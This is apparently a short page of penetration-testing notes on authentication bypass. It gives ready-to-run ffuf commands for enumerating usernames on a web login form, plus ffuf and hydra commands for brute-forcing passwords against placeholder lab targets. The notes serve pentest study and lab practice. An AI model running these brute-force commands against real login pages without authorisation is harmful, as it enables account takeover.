CtrlK

Pentest Notes / Exploitation / Web Exploitation

Authentication Bypass

Username Enumeration

Filter by response recieved for a username that already exits:

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&password=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://[MACHINE_IP]/loginpage.php -mr "[message for valid username]"

Password bruteforce with valid username

ffuf:

ffuf -w [valid_usernames.txt]:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://[MACHINE_IP]/login -fs [response_size]

hydra:

hydra -l [username] -P [wordlist] [MACHINE_IP/loginpage] http-post-form "/:username=^USER^&password=^PASS^:[invalid response]" -V